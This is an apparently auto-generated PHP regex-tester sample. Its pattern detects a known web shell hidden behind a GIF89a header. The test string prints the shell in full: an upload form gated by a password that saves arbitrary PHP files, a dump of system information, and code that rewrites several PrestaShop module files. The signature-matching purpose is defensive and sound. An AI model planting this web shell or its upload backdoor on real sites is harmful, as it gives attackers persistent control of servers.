$re = '/^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*echo\s*["\']privet\s*bot\s*by\s*bajatax\s*\&\&\s*xsam\-xado/is';
$str = 'gif89a
<?php echo \'privet bot by bajatax && xsam-xadoo\'.\'<br>\'.\'uname:\'.php_uname().\'<br>\'.$cwd = getcwd(); echo \'<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> <input type="password" name="baja_xsam" value="sirt7wa"></form> </center></td></tr> </table><br>\'; if (!empty ($_files[\'uploads\']) and md5(md5(md5($_post["baja_xsam"]))) == "ddb0bfc94159c6ac960367ef994ae246"
) { move_uploaded_file($_files[\'uploads\'][\'tmp_name\'],md5(time()).".php"); echo "<b>uploaded !!!</b><br>name : ".md5(time()).".php"."<br>size : ".$_files[\'uploads\'][\'size\']."<br>type : ".$_files[\'uploads\'][\'type\']; }
$path_exploit_payloads=array("/modules/explorerpro/action.php","/modules/sampledatainstall/sampledatainstall-ajax.php","/modules/colorpictures/ajax/upload.php",);
foreach($path_exploit_payloads as $path_exploit_payload){
if(file_exists($path.$path_exploit_payload)){
$html=" ";
if(function_exists("file_get_contents")){
$html=file_get_contents($path.$path_exploit_payload);
}
if(!preg_match("/hash_bajatax/i",$html)){
$save=fopen($path.$path_exploit_payload,"w");
fwrite($save,\'<?php if(md5(md5(md5($_post["hash_bajatax"]=="7200c4e8bb32ac615efe537aa72d8667")))) { ?> \'.$html." <?php } ?>");
fclose($save);
}
}
}
?>
';
preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);
// Print the entire match result
var_dump($matches);
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for PHP, please visit: http://php.net/manual/en/ref.pcre.php